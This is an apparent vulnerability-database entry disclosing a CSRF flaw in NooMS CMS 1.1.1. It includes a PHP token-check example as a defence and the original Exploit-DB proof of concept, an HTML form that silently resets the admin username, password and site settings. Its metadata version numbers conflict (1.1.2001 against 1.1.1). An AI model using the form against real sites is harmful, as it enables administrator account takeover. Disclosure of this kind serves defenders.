Vendor: NooMS
By: loneferret
CVSS: 3.1 (MEDIUM)
CWE: 352, Cross-Site Request Forgery (CSRF)
Product Name: NooMS
Affected Version From: 1.1.2001
Affected Version To: 1.1.2001
Patch Exists: NO
Related CWE: N/A
CPE: a:phpkode:nooms:1.1.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2011

NooMS CMS version 1.1.1 CSRF

A Cross-Site Request Forgery (CSRF) vulnerability exists in NooMS CMS version 1.1.1. An attacker can craft a malicious HTML page containing a form with hidden fields that, when submitted, modifies the settings of the NooMS CMS. The form contains fields for the admin username, admin password, site name, site URL, number of results per page, language, and theme. An attacker can modify these settings without the knowledge of the administrator.

Mitigation:

The vendor has not released a patch for this vulnerability. As a workaround, administrators should ensure that they are not using NooMS CMS version 1.1.1.
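
The check the settings request lacks, sketched as an added example (not NooMS code and not written by the advisory's author): a synchronizer-token guard for the op=pref / action=edit POST to admin.php. The function names, the csrf_token field and the host cms.example.test are assumptions, and the code needs PHP 7 or later.

```php
<?php
// Added example: CSRF guard for a state-changing admin request such as
// POST admin.php with op=pref, action=edit. Not NooMS code; the function
// names and the 'csrf_token' field name are assumptions.

// Return the per-session token, creating it on first use.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hidden field to emit inside every admin form the application renders.
function csrf_field(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

// True only if the request carries the session's token and, when the
// browser sent an Origin header, that header names the expected host.
function csrf_request_ok(array $post, array $server, string $expectedHost): bool
{
    $sent  = $post['csrf_token'] ?? '';
    $known = $_SESSION['csrf_token'] ?? '';
    if (!is_string($sent) || $known === '' || !hash_equals($known, $sent)) {
        return false;
    }
    if (!empty($server['HTTP_ORIGIN'])) {
        $host = parse_url($server['HTTP_ORIGIN'], PHP_URL_HOST);
        if (!is_string($host) || strcasecmp($host, $expectedHost) !== 0) {
            return false;
        }
    }
    return true;
}

session_start();
// Reject a preference change without a valid token before anything is written.
if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST'
    && ($_POST['op'] ?? '') === 'pref' && ($_POST['action'] ?? '') === 'edit'
    && !csrf_request_ok($_POST, $_SERVER, 'cms.example.test')) { // placeholder host
    http_response_code(403);
    exit('CSRF check failed');
}
```

A form submitted from another site cannot read the session's token, so it fails the hash_equals comparison and the settings are left unchanged.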

Exploit-DB raw data:

# NooMS CMS version 1.1.1 CSRF
# Bug Found: April 9th 2011
# Found by: loneferret (as far as I know anyway)
# Software Download Link: http://phpkode.com/download/p/2381_nooms_1.1.1.tar.bz2
# Nods to exploit-db Team


# Well, I didn't have much to do this morning so figured I'd try to see how fast it would take
# me to find one of these. It's nothing to write home about. I mean...come on! Who would use
# a CMS named NooMS? This thing uses a MySQL database as well, wouldn't be surprised if
# there are other things to be found.
# But I need to get some chores done before the wife starts.

#
# Enjoy,
# loneferret
#
# p.s:
# I wanted to contact the creator, but his page (using NooMS) is
# blank... nothing there so.. sorry.

---HTML STARTS HERE---

<form action='http://[host]/admin.php' method='post'>
  <input type=hidden name='op' value='pref'>
  <input type=hidden name='action' value='edit'>

  Admin Username: <input type=text size=20 name='admin_user' value=''><br>
  Admin Password: <input type=text size=20 name='admin_pwd' value=''><br>
  Site Name: <input type=text size=40 name='site_name' value=''><br>
  Site URL: <input type=text size=40 name='site_url' value=''><br>
  Number of results per page: <input type=text size=10 name='search_numr' value=''><br>
  Lang: <input type=text size=10 name='lang' value='en'><br>
  Theme: <input type=text name=template value='default'>
  <input type=submit value='change'>
</form>